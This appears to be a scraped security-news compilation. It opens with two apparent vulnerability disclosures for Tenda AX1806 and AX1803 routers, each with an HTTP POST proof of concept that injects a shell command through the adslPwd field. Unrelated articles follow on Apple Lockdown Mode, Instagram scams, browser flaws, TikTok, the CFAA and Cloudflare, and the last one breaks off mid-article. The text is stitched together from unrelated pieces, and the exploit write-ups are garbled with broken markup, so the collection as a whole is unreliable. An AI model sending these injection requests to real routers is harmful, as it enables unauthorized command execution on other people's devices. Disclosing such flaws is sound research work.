Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

**\*\*\* Command Injection Vulnerability in Tenda AX1806 \*\*****_**\*Overview\***_**

*   _**\*Type\***_: Command Injection Vulnerability
    
*   _**\*Supplier\***_: Tenda ( https://tenda.com.cn )
    
*   \*\*\*Product\*\*: WiFi router AX1806
    
*   Firmware download address: \*\*\*\* https://www.tenda.com.cn/download/detail-3306.html
    
*   Firmware download address: \*\*\*\* https://down.tenda.com.cn/uploadfile/AX1806/US\_AX1806V21brv1001cn2988ZGDX01.zip
    

Tenda AX1806 uses a new generation of WIFI6 (802.11ax) technology, and combines higher number of subcarriers and 1024QAM modulation technology. Compared with wifi-5 routers, dual-band wireless internet access rate is greatly improved. WanParameterSetting has a Command Execution Vulnerability

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of Tenda AX1806 router simulation:

\### \*_**2\. Vulnerability Details\***_

Tenda AX1806 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

**_**\*3. Recurring loopholes and POC\***_**

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34597: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Tenda AX1803 v1.0.0.1_2890 was discovered to contain a command injection vulnerability via the function WanParameterSetting.

#_**\* Tenda ax1803 has a command injection vulnerability\***_

##\* \* \* \\ \* overview\*\*\*\*

• \*\*\*\*\* type \\ \*\*\*\*: command injection vulnerability

• \* \* \* \\ \* supplier \\ \* \* \* \*: Tenda（ https://tenda.com.cn ）

• \*\*\*\*\* product \*\*\*\*: WiFi router ax1803

• _**\* firmware download address:\***_ https://www.tenda.com.cn/download/detail-3225.html

• _**\* firmware download address:\***_ https://down.tenda.com.cn/uploadfile/AX1803/US\_AX1803v2.1br\_v1.0.0.1\_2890\_CN\_ZGYD01.zip

Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network! Command Execution Vulnerability in wanparametersetting

**_**\*Description\***_****\*_**1, Product Information:\***_**

Overview of the latest version of simulation for Tenda AX1803 router:

**\*_**2\. Vulnerability Details\***_**

Tenda AX1803 was found to have a command injection vulnerability in the WanParameterSetting function

The non-zero is true, and when we change the adslPwd parameter, we get a command injection vulnerability after setting it.

\## _**\*3. Recurring loopholes and POC\***_

To reproduce the vulnerability, the following steps can be followed:

Start firmware (real machine) via qemu-system or other means

Attack using the following POC attacks

Note the replacement of password fields in cookies

    POST /goform/WanParameterSetting?0.8762489734485668 HTTP/1.1
    Host: i92.168.68.150
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://i92.168.68.150
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    wanType=2&adslUser=aaaa&adslPwd=$(ls > /tmp/xxx)&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=l&dnsAuto=1&staticIp=&mask=&gateway=&dnsl=&dns2=&module=wanl&downSpeedLimit=

CVE-2022-34596: IOT_Vul/readme_en.md at main · zhefox/IOT_Vul

Starting with iOS 16, people who are at risk of being targeted with spyware will have some much-needed help.

The surveillance-for-hire Industry has emerged in recent years as a very real threat to activists, dissidents, journalists, and human rights defenders around the world, as vendors offer increasingly invasive and effective spyware to governments. The most sophisticated of these tools, like NSO Group's notorious Pegasus spyware, target victims' smartphones using rare and sophisticated exploits to compromise Apple's iOS and Google's Android mobile operating systems. As the situation has deteriorated for victims, activists and security experts have increasingly called for more drastic measures to protect vulnerable individuals. Now Apple has an option.

Today, Apple is announcing a new feature for its upcoming iOS 16 release called Lockdown Mode. Apple emphasizes that the feature was created for a small subset of users who are at high risk of government targeting, and it doesn't expect the feature to be widely adopted. But for those who want to use it, the feature is an alternate mode of iOS that heavily restricts the tools and services that spyware actors target to take control of victims' devices.

“This is an unprecedented step for user security for high-risk users,” Ron Deibert, director of the University of Toronto's Citizen Lab said on a call with reporters ahead of the announcement. “I believe that this will throw a wrench into their modus operandi. I expect \[spyware vendors\] to try to evolve, but hopefully, this feature will prevent some of those harms from happening down the road.”

Lockdown Mode is a separate operating system mode. To turn it on, users enable the feature in the Settings menu and then are prompted to restart their device for all of the protections and digital defenses to fully take effect. The feature imposes limitations on the leakiest parts of the operating system sieve. Lockdown Mode attempts to comprehensively address threats from web browsing, for example, by blocking many speed and efficiency features that Safari (and WebKit) use to render webpages. Users can specifically mark a certain webpage as trusted so it loads normally, but by default, Lockdown Mode imposes a host of restrictions that extend anywhere WebKit is working behind the scenes. In other words, when you load web content in a third-party app or an iOS app like Mail, the same Lockdown Mode protections will apply. 

Lockdown Mode also limits all sorts of incoming invitations and requests, unless the device has previously initiated a request. That means your friend won't be able to call you on FaceTime, for example, if you've never called them. And to take it one step further, even when you initiate an interaction with another device, Lockdown Mode only honors that connection for 30 days. If you don't talk to a particular friend for weeks after that, you'll need to reestablish contact before they can reach out to you again. In Messages—a frequent target of spyware exploitation—Lockdown Mode won't show link previews and will block all attachments with the exception of a few trusted image formats.

Lockdown Mode also strengthens other protections. For example, when a device is locked, it won't receive connections from anything physically plugged into it. And, crucially, a device that isn't already registered with one of Apple's enterprise mobile device management (MDM) programs can't be added to one of these schemes once Lockdown Mode is turned on. This means that if your company gives you a phone enrolled in the corporate MDM, it will remain active if you then enable Lockdown Mode. And the manager of your MDM can't remotely turn off Lockdown Mode on your device. But if your phone is just a regular consumer device and you put it in Lockdown mode, you won't be able to activate MDM. This is important because attackers will trick victims into enabling MDM as a way of gaining the ability to install malicious apps on their devices.

Apple says the idea of Lockdown Mode feels foreign because iOS has always been developed to offer all security protections to every user. But the company saw the necessity to take drastic action as more and more spyware victims emerged worldwide. The company says it plans to continue refining Lockdown Mode and expanding it as needed. It also added a new category to its bug bounty program to reward researchers up to $2 million for finding flaws in Lockdown Mode or total bypasses. 

The company also pledged in November to donate $10 million to research and defense related to targeted spyware. On Wednesday, Apple is announcing that this money will become a grant to the Ford Foundation's Dignity and Justice Fund. At launch, advisers for the fund will come from Access Now, Citizen Lab, the Engine Room, Amnesty International, and Apple.

“The mercenary spyware industry is facilitating the spread of authoritarian practices,” Citizen Lab's Deibert emphasizes. “I applaud Apple for developing Lockdown Mode. It will be a major blow to mercenary spyware companies.”

Targeted spyware has proved a complicated threat to counter, and the industry is only growing. But a radical new defense can only help potential targets around the world who are exposed and in dire need of resources.

Apple’s Lockdown Mode Aims to Counter Spyware Threats

Fake sellers. Competitions. Crypto cons. There are plenty of grifts on the platform, but you don’t have to get sucked in.

Since Mark Zuckerberg snapped up Instagram for a mere $1 billion in April 2012, the app has grown into a social media juggernaut and one of Meta’s biggest assets. More than a billion people use Instagram every month, with influencers relying on it as a key source of their income.

Any online congregation of this size is naturally a target for hackers and scammers looking to take advantage of people and make a quick buck. As a result, Instagram is a frequent objective for scammers trying to take over your account and get you to send them money, as well as for shilling cryptocurrency scams.

“Instagram scams and account takeovers are a big problem,” says Jessica Barker, the co-CEO of cybersecurity company Cygenta, who says she has seen a recent uptick in reports of Instagram scammers. “Scams take place over all social media platforms, but Instagram’s popularity, open nature, and sense of personal connection make it an ideal platform for scammers to exploit.”

Still, it is possible to avoid the vast majority of Instagram scams with a little knowledge of what to be cautious of and some quick changes to your account settings.

How to Spot Scams on Instagram

Scammers move quickly. Whenever there’s a big event such as Russia’s war in Ukraine, the outbreak of Covid-19, or rapidly fluctuating cryptocurrency prices, the scams appear soon afterward. Online scams are constantly evolving, which means there are plenty of ways scammers may try to extort you. One startup is now even selling insurance against Instagram hacks.

“With Instagram being so popular, audiences can grow quickly, and often the number of followers can make people trust an account in no time,” says Jake Moore, global cybersecurity advisor at security firm ESET. “This is accelerated when known contacts already follow such accounts, and this trust can be a very forceful presence if required to make victims hand over details such as their credentials to a fake landing page to ‘sign in,’ for example.”

Instagram details the wide range of potential scams in a post on its website. These include loan and investment scams such as cryptocurrency scams, competitions and giveaway scams, job scams involving fake job ads, phishing scams to gain access to your account, and counterfeit products like fake iPhones and Apple Watches.

Scammers try to achieve a couple of things: They want you to send them money or get access to your Instagram account so it can be used in ongoing and future scams. These scams often work in similar ways as scammers try to trick you into either handing over personal information or money, or get you to click on links that can harvest your login details.

It’s likely that a lot of scam efforts on Instagram will be directed at you using direct messages. Scammers can send you messages or links to click on that lead to phishing websites. “A good way to recognize if you’re being manipulated is to look out for communications that are unexpected, make you feel something, and ask you to do something,” Barker says.

If an account slides into your DMs saying you’ve won a competition or that you should check out a way to make money quickly, or is offering some kind of promotional collaboration, then it's probably too good to be true. (You should delete the messages and report the scam.)

“When it comes to spotting a scam on Instagram, people should look out for messages asking you to click on a link, even if they appear to come from a friend, a trusted brand, or Instagram itself,” Barker adds. Scam messages often include typos, poor English, or want you to click on a link taking you away from the app. They often also come from recently created accounts.

Scammers have been spotted using Instagram’s logo and branding to send tech, verification, or security support messages to people via DMs. These are all fakes. Instagram says it will never send you direct messages about your account. (You can see official emails from Instagram in the app’s settings.) “Look out for posts about giveaways, gift cards, and investment schemes, as these are common tactics for criminals,” Barker says. If a brand is contacting you from an unverified account, you should be very cautious about replying.

Scams also come through Instagram Stories. “Fraudsters abuse the Instagram Stories feature, posting scams there that autodelete after 24 hours,” says Chris Boyd, lead malware intelligence analyst at cybersecurity firm Malwarebytes. “The scam is hidden behind their profile picture; you won't see it in the main collection of images,” Boyd says, adding that this move helps to keep the scam away from Instagram feeds and automatically vanish, making it harder to detect.

While competition scams and attempts to access people’s accounts aren’t new, Instagram has also seen a rise in “hostage-style” scams, where people are forced to post videos telling people to invest in bitcoin or other cryptocurrencies to get their hacked accounts returned. Multiple Instagram users, as reported by _VICE_, have been pressured into recording videos after their accounts were hacked. Other people report losing thousands to Instagram scammers. The incidents highlight why you shouldn’t trust every account you follow.

"Cryptocurrency scams are quick methods to whisk users away from the relative safety of the Instagram platform and onto trading sites where Instagram can't help,” Boyd says. “Extortion-driven cryptocurrency endorsements are a smart move on the part of the scammer. Leveraging people you know and trust in visual mediums to promote something is always going to be more convincing than a random email.”

How to Avoid Getting Scammed

There are things you can do to avoid getting hacked and the worst scams—these are a mixture of security settings and slight behavioral tweaks. Thankfully the process isn't too complicated, and small changes can make a big difference.

First, as mentioned earlier, you should avoid clicking on links that are sent to you, especially from accounts that you don’t know personally, or if someone you know sends a URL that seems out of character. “Following an account for many months still may not make it an authentic account,” Moore says.

If an account doesn’t seem right, you can look into its origins. “Research accounts to decide if they can be trusted—you can find information, such as when an account was created, by clicking **About this Account** under a profile. You can also check whether accounts are verified,” Barker says.

Second, your default setting should be one of suspicion. If your Instagram account is public, anyone can see your posts and message you. By limiting who can message you, you reduce the chances of being exposed to scams. To change whether your account is public or private, visit **Settings**, **Privacy**, and toggle your account to **Private**.

While you are in privacy settings, you should also limit who can message you. Under **Messages** there are options to send received messages to a Message Requests folder, and you can stop accounts that don’t follow you from messaging you through the **Others on Instagram** menu. For more details, see our guides on how to limit who can contact you on Instagram and the steps you can take to stop tracking and improve your Instagram privacy.

Arguably the biggest way you can protect your account from being taken over by scammers is by using a unique, strong password—stored in a password manager—and turning on multifactor authentication. Enabling multifactor authentication requires anyone trying to log in to your account to use a login code or click a notification in addition to using your password—and it's effective against account takeovers.

To turn on two-factor authentication on Instagram, tap on your profile picture in the bottom right corner of your phone, then tap on the hamburger menu. Go to **Settings**, then **Security**, then **Two-Factor Authentication**. You can turn on security protection there. If, in the worst-case scenario, your Instagram account does get hacked, here’s what you should do.

How to Avoid the Worst Instagram Scams

As a result of browser market consolidation, adversaries can focus on uncovering vulnerabilities in just two main browser engines.

Everyone uses browsers to access a wide range of networked systems, from shopping sites to enterprise management. As a result, browsers collect tons of sensitive information — from passwords to credit card data — that hackers are eager to get their hands on.

Moreover, browser vendors frequently add new features, which increases the risk of flaws in program code that hackers can exploit. And even though there seem to be a lot of different Web browsers, there are actually just two open source browser engines. Chrome, Vivaldi, Brave, and many other browsers are all built on the same engine, Chromium.

Even Microsoft killed Internet Explorer in 2021 and switched to Chromium with Edge. The only surviving alternative to Chromium is Mozilla Firefox, which uses a different engine; all the other browsers are proprietary corporate tools like Apple Safari. As a result of this consolidation, adversaries can closely focus on undercovering the vulnerabilities in the two browser engines.

**The Latest Critical Web Browser Vulnerabilities  
**Every month, we see myriad serious new Web browser vulnerabilities. In the first half of 2022, Chrome has announced three zero-day vulnerabilities. By exploiting CVE-2022-0609, hackers can corrupt data and execute code on vulnerable systems. CVE-2022-1096, which was discovered in the wild, affects the JavaScript V8 engine. CVE-2022-1364, which was also discovered in the wild, can be exploited to trigger remote code execution on a targeted system, and affects not just the nearly 3 billion users of Chrome, but also everyone using any other Chromium-based browser.

Mozilla is not immune from vulnerabilities, either. So far in 2022, we've seen CVE-2022-22753, a high-severity vulnerability that can enable an adversary to get admin rights in Windows; CVE-2022-22753, which could be abused to gain access to an arbitrary directory; and CVE-2022-1802 and CVE-2022-1529, which could be exploited to enable JavaScript code execution.

The problem is not just serious but growing: In the first quarter of 2022 alone, Chrome fixed 113 vulnerabilities, 13% more than in the same period in 2021, while Firefox fixed 88 vulnerabilities, a 12% jump from the first quarter of 2021. These increases make browsers a top target for hackers.

**How Hackers Attack Browsers  
**Hackers use multiple techniques to exploit browser vulnerabilities. Occasionally, they will discover a vulnerability that enables them to download and execute malicious code when a user simply visits a compromised site. From there, the code can download other malicious packages or steal sensitive data. Plug-ins are a common vector for these "drive-by download" attacks.

A more common tactic, however, is for hackers to send phishing emails that contain exploit kits targeting Web browsers. Indeed, Cisco's 2021 cybersecurity threat trend report found that about 90% of data breaches were due to phishing. A person clicks on a link in a phishing email, which opens a malicious page in their browser, which can exploit an unpatched vulnerability in the browser to deploy malware or steal data stored in the browser. For example, Magnitude actively targeted Chromium in October 2021.

**Strategies to Mitigate Risk From Browser Vulnerabilities  
**Organizations should combine multiple techniques to reduce their risk from browser vulnerabilities. The first is to keep all browsers updated. However, patching browsers can be problematic. Research shows that 83% of users run versions of Chrome that are vulnerable to zero-day attacks that have already been identified by Google. One reason is simply that many users do not like rebooting their browsers, which is often required as part of an update.

Another barrier to patching is that many people install browsers under their user profiles, into folders that system administrators cannot access without special tools. To overcome these issues, automate patching for third-party apps, including browsers; ensure your IT teams can force reboots remotely in a way that is convenient to end users; and manage applications installed under user profiles.

The second measure is to enforce multifactor authentication (MFA) on all critical systems and services. That way, hackers will be unable to access those resources even if they manage to steal a user's credentials.

Third, regularly clear the browser history on users' machines to erase stored passwords, and to clear their cookies as well, since they can enable attackers to access services such as email without the user's credentials. Ensure your IT teams can perform these tasks remotely and, ideally, automate them.

Fourth, remember the human factor. Be sure to roll out an extensive cybersecurity awareness program that educates all your users about security best practices and why they should follow them. In particular, teach them how to spot phishing emails and why to avoid using browser plug-ins or extensions, especially those that don't receive regular updates. In addition, train them to choose strong and unique passwords for each website they visit and not to store passwords in their browsers; to facilitate this, give them a password management app.

Why Browser Vulnerabilities Are a Serious Threat — and How to Minimize Your Risk

According to the FCC commissioner, TikTok being a video app is the "sheep's clothing", suggesting a wolf hides underneath those funny videos.
The post TikTok is “unacceptable security risk” and should be removed from app stores, says FCC appeared first on Malwarebytes Labs.

Brendan Carr, the commissioner of the FCC (Federal Communications Commission), called on the CEOs of Apple and Google to remove TikTok from their app stores. In a letter dated June 24, 2022, Carr told Tim Cook and Sundar Pichai that “TikTok poses an unacceptable national security risk due to its extensive data harvesting being combined with Beijing’s apparently unchecked access to that sensitive data.”

Carr also said:

> But it is also clear that TikTok’s pattern of conduct and misrepresentations regarding the unfettered access that persons in Beijing have sensitive US user data … puts it out of compliance with the policies that both of your companies require every app to adhere to as a condition of remaining available on your app stores.
> 
> Therefore, I am requesting that you apply the plain text of your app store policies to TikTok and remove it from your app stores for failure to abide by those terms.

In the Twitter thread, Carr pointed out the national security risks TikTok poses.

**Excessive data collection**

TikTok is said to collect “everything”, from search and browsing histories; keystroke patterns; biometric identifiers—including faceprints, something that might be used in “unrelated facial recognition technology”, and voiceprints—location data; draft messages; metadata; and data stored on the clipboard, including text, images, and videos.

Carr cited several incidents as evidence that TikTok has been dodgy about its data collection practices.

**Relation to the CCP (Communist Party of China)**

ByteDance, a company based in Beijing, developed TikTok. In China, it is known as Douyin. Carr mentioned in his letter to Apple and Google that ByteDance “is beholden to the Communist Party of China and required by Chinese law to comply with the PRC‘s surveillance demands.”

The Senate and House committee members, cybersecurity researchers, privacy, and civil rights groups have flagged this as a concern. In 2019, two senators labeled TikTok as a “potential counterintelligence threat we cannot ignore”. The American Civil Liberties Union (ACLU) is also concerned about the social platform’s “vague” policies, especially in collecting and using biometric data.

**Unclear use of collected data**

It’s a non-issue for apps that are clear about collecting data, but these must also say how they use the data they collect. TikTok, it appears, is not one of those apps that do not abide by this clause.

“Numerous provisions of the Apple App Store and Google Play Store policies are relevant to TikTok’s pattern of surreptitious data practices—a pattern that runs contrary to its repeated representations,” the letter reads.

“For instance, Section 5.1.2(i) of the Apple App Store Review Guidelines states that an app developer ‘must provide access to information about how and where the data \[of an individual will be used’ and ‘\[d\]ata collected from apps may only be shared with third parties to improve the app or serve advertising.”

**Is TikTok a “sophisticated surveillance tool”?**

TikTok didn’t sit on its hands when news spread of the FCC calling for its removal from major app stores.

Speaking with CNN’s “Reliable Sources”, Michael Beckerman, VP, Head of Public Policy, Americas at TikTok, refuted a large chunk of the FCC’s claims against the social media company, predicated on the notion that Carr is isn’t an expert on such issues and that FCC doesn’t have jurisdiction over national security.

“He’s pointing out a number of areas that are simply false in terms of information that we’re collecting, and we’re happy to set the record straight,” Beckerman said.

When asked about the inaccuracies in Carr’s claims, Beckerman responded: “He’s mentioning we’re collecting browser history, like we’re tracking you across the internet. That’s simply false. It is something that a number of social media apps do without checking your browser history across other apps. That is not what TikTok does.”

“He’s talking about faceprints—that is not something we collect,” he said, explaining that the technology in their app is not for identifying individuals but for the purpose of filters, such as knowing when to put glasses or a hat on a face/head.

Concerning keystroke patterns, Beckerman said, “It’s not logging what you’re typing. It’s an anti-fraud measure that checks the rhythm of the way people are typing to ensure it’s not a bot or some other malicious activity.”

When challenged if the CCP has seen any non-public user data, he said, “We have never shared information with the Chinese government nor would we \[…\] We have US-based security teams that manage access, manage the app, and, as actual national security agencies like the CIA during the Trump administration pointed out, the data that’s available on TikTok—because it’s an entertainment app—is not of a national security importance.”

Politicians and privacy advocates have criticized TikTok for potentially exposing US user data to China for years. To allay fears, TikTok teamed up with Oracle and began routing data of its American users to US-based servers.

This, however, doesn’t answer some questions raised when Buzzfeed News broke the story about TikTok employees in China “repeatedly” accessing US user data for at least several months. Such incidents reportedly occurred from September 2021 to January 2022, months before the Oracle data rerouting.

There is also an allegation that a member of TikTok’s trust and safety department said in a meeting that “Everything is seen in China”. A director in another meeting allegedly claimed that a colleague in China is a “Master Admin” who “has access to everything.”

“We want to be trusted,” Beckerman said during the CNN interview. “There’s obviously a lack of trust across the Internet right now, and for us, we’re aiming for the highest, trying to be one of the most trusted apps, and we’re answering questions and being as transparent as we can be.”

TikTok is “unacceptable security risk” and should be removed from app stores, says FCC

This week on Lock and Code, we discuss the various laws that can be violated when good-faith hacking reveals security flaws. 
The post When good-faith hacking gets people arrested, with Harley Geiger: Lock and Code S03E14 appeared first on Malwarebytes Labs.

When Lock and Code host David Ruiz talks to hackers—especially good-faith hackers who want to dutifully report any vulnerabilities they uncover in their day-to-day work—he often hears about one specific law in hushed tones of fear: the Computer Fraud and Abuse Act.

The Computer Fraud and Abuse Act, or CFAA, is a decades-old hacking law in the United States whose reputation in the hacker community is dim. To hear hackers tell it, the CFAA is responsible not only for equipping law enforcement to imprison good-faith hackers, but it also for many of the legal threats that hackers face from big companies that want to squash their research.

The fears are not entirely unfounded.

In 2017, a security researcher named Kevin Finisterre discovered that he could access sensitive information about the Chinese drone manufacturer DJI by utilizing data that the company had inadvertently left public on GitHub. Conducting research within rules set forth by DJI’s recently announced bug bounty program, Finisterre took his findings directly to the drone maker. But, after informing DJI about the issues he found, he was faced not with a bug bounty reward, but with a lawsuit threat alleging that he violated the CFAA.

Though DJI dropped its interest, as Harley Geiger, senior director for public policy at Rapid7, explained on today’s episode of Lock and Code, even the threat itself can destabilize a security researcher.

> “\[It\] is really indicative of how questions of authorization can be unclear and how CFAA threats can be thrown about when researchers don’t play ball, and the pressure that a large company like that can bring to bear on an independent researcher.”
> 
> Harley Geiger

Today, on the Lock and Code podcast, we speak with Geiger about other hacking laws can be violated when conducting security researcher, how hackers can document their good-faith intentions, and the Department of Justice’s recent decision to not prosecute hackers who are only hacking for the benefits of security.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

When good-faith hacking gets people arrested, with Harley Geiger: Lock and Code S03E14

British software engineer also talks HTTP/3, zero trust, and lava lamp-powered cryptography

British software engineer also talks HTTP/3, zero trust, and lava lamp-powered cryptography

INTERVIEW The hegemony of CAPTCHAs, the reliably infuriating means by which websites distinguish human users from bots, is – mercifully – in peril.

John Graham-Cumming, chief technology officer (CTO) at web security and performance specialist Cloudflare, tells The Daily Swig that an alternative technology developed by Cloudflare, Apple, Google, and others eliminates the friction and privacy infringements involved in clicking squares that contain bicycles, vans, or traffic lights.

RELATED WWDC 2022: Apple showcases next-gen security tech at annual developer event

Incidentally, CAPTCHAs – or ‘Completely Automated Public Turing Tests to tell Computers and Humans Apart’ – reference the legendary computer scientist Alan Turing, who received a posthumous apology from the UK government in 2009 following an online campaign by Graham-Cumming.

Graham-Cumming, the POPFile architect who shares with fellow Brit Turing a remarkable mathematical acuity, also talks HTTP/3, ‘zero trust’ architecture, the distributed denial-of-service (DDoS) landscape, and novel ways to generate random, cryptographic numbers.

Daily Swig: Last month Cloudflare announced Private Access Tokens, a technology that leverages ‘private attestation’ to offer an alternative to CAPTCHAs. What drove the decision to focus on this area of authentication?

John Graham-Cumming: Does anybody like CAPTCHAs? They're the most frustrating thing ever, and are often used across websites, so can potentially be used for tracking.

We’ve driven down our use of CAPTCHAs over time by replacing them with other methods.

Private attestation demonstrates that you are essentially coming from a known device. Apple knows who I am, what I use my device for, and they are able to say to a website, ‘This is a legit human, the device hasn't been hacked’.

And private attestation uses a bunch of clever cryptography to prove that you are legit without Apple saying who you are. We think this is going to remove CAPTCHAs in a way that preserves people’s privacy.

Unveiled at WWDC 2022, will Private Access Tokens become the CAPTCHA-killer?

DS: Cloudflare has also just added new capabilities to its network-as-a-service zero trust platform, Cloudflare One. How important is the move to zero trust architecture and is it happening quickly enough?

JGC: Businesses used to keep their employees, servers, and applications inside heavily guarded walls. If you needed to travel, there were VPNs.

But the castle walls got stormed from the inside out when applications started moving out of the business with SaaS, the cloud, and mobile devices. Suddenly the castle walls didn’t make sense.

‘Zero trust’ provides a much more flexible and less expensive \[alternative\] and Cloudflare has been a player in this space for a long time.

Before the pandemic we announced Cloudflare for Teams, which allows teams to work remotely, and we launched zerotrustroadmap.org to help businesses plan out which applications are going to be outside and inside the firewall, how you connect, \[and\] who you connect \[with\].

I think that businesses are, by and large, on a journey towards zero trust. Some are more advanced, some are less advanced. The US federal government has talked about zero trust as the right architecture.

RELATED US government’s ‘zero trust’ roadmap calls time on perimeter-based paradigm

It reflects how we work, and Covid just accelerated this trend because suddenly everybody was at home and needed access.

How significant was the recent news that the HTTP/3 protocol received RFC 9114 standardization?

JGC: About 25% of traffic on Cloudflare already uses HTTP/3, and major browsers are implementing it very quickly, so it’s clearly getting taken up very quickly.

It’s fantastic to see this level of innovation because we depend on HTTP for pretty much everything we do online.

There was a very long standardization process between HTTP/1.1 and HTTP/2, so the fact HTTP/3 was able to follow on quite quickly is a sign that we really are continuing to innovate at fundamental levels on the internet.

What important trends are you seeing when it comes to defending your clients against DDoS attacks?

JGC: Attackers don’t just go after the front door anymore – knocking your website offline. Now attackers are more business-like, especially in ransom-related DDoS where they might go after your DNS, email server, or VPN servers.

Read more cybersecurity interviews

Second, although there are still very large attacks at the network level, there has been a rise at the application level. And I think this is partly because we’ve got very good at defending against network-level attacks.

We’ve also seen more use of cloud providers as the source of attacks. I think this is partly to get the request-per-second up really high, because you get more compute power, and because everything on the web is becoming HTTPS, then attacks are also running over HTTPS and that’s more expensive for the attacker.

Cloudflare’s John Graham-Cumming: ‘We really are continuing to innovate at fundamental levels on the internet’

What inspired Cloudflare’s use of lava lamps to generate random numbers for SSL encryption?

JGC: It’s part \[practically useful\] and part art project. You can generate random numbers in all sorts of ways using different physical processes. Radioactivity is a classic one \[as ripening bananas can demonstrate\] and there are interesting quantum things.

Catch up with the latest encryption security news

In London we have a wall of double pendulums, because it turns out that a pendulum attached to a pendulum moves in a very unpredictable way.

We wanted to make the point that randomness is fundamental to keeping things secure online, but computers are not fantastic at creating random numbers. You, me, and everybody else have been told over and over again not to pick easy-to-guess passwords – which is a way of saying ‘pick random passwords’.

Cloudflare has evolved considerably since its foundation in 2009 as an email spam protection platform. How might it continue to evolve in the coming months or years?

JGC: Fundamentally, Cloudflare makes things that are connected to the internet faster, more available, more secure, and more private.

Our product roadmap is really about bringing those attributes to internet-connected things across our application services, CDN \[content delivery network\], DDoS, network services, and our compute platform, Cloudflare Workers.

We recently acquired an email protection company called Area 1, so email is becoming a big area for us.

Don't forget email – it’s old, but it’s still important. Something like 80-90% of security problems at companies start with email, through phishing and stuff like that.

What are you most proud of in your career and why?

JGC: Having built Cloudflare up from having 20-something people to making a real impact on everybody’s use of the internet in terms of security and performance is probably the most satisfying thing.

And doing that with a curious, empathic, open culture is very satisfying.

Everybody always asks me about the Alan Turing thing. I’m glad I did it, but it feels like a long time ago now!

RECOMMENDED HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

‘Does anybody like CAPTCHAs?’ – Cloudflare CTO John Graham-Cumming envisages a frictionless future for website Turing tests

To celebrate Independence Day we're drawing attention to five technologies that could improve life, liberty and the pursuit of happiness on the Internet. 
The post 5 pro-freedom technologies that could change the Internet appeared first on Malwarebytes Labs.

In the digital era, freedom is inextricably linked to privacy. After a good start, the Internet-enabled, technological revolution we are living through has hit some bumps in the road. We have already lost a lot of control over who and what has access to our data, and there are further threats to our freedom on the horizon.

It doesn’t have to be that way though, and it is not inevitable that the trend will continue. To celebrate Independence Day we want to draw your attention to five technologies that could improve life, liberty and the pursuit of happiness on the Internet.

The technologies are listed in a rough order of simplest, soonest, and most likely to happen, to most complex, furthest out, and least likely to happen.

**DNS encryption**

DNS encryption plugs a gap that makes it easy to track the websites you visit.

The domain name system (DNS) is a distributed address book that lists domain names and their corresponding IP addresses. When you visit a website, your browser sends a request to a DNS resolver, which responds with the IP address of the domain you’re visiting. The request is sent in plain text, which is the computer networking equivalent of yelling the names of all the websites you’re visiting out loud.

Anyone, or anything, on the same local network as you can see your DNS lookups, as can your ISP, which will happily sell your browsing history to the highest bidder. And any machine-in-the-middle (MitM) attackers between you and the DNS resolver—such as rogue Wi-Fi access points—can also silently change your plain text DNS requests and use them to direct you to malicious websites.

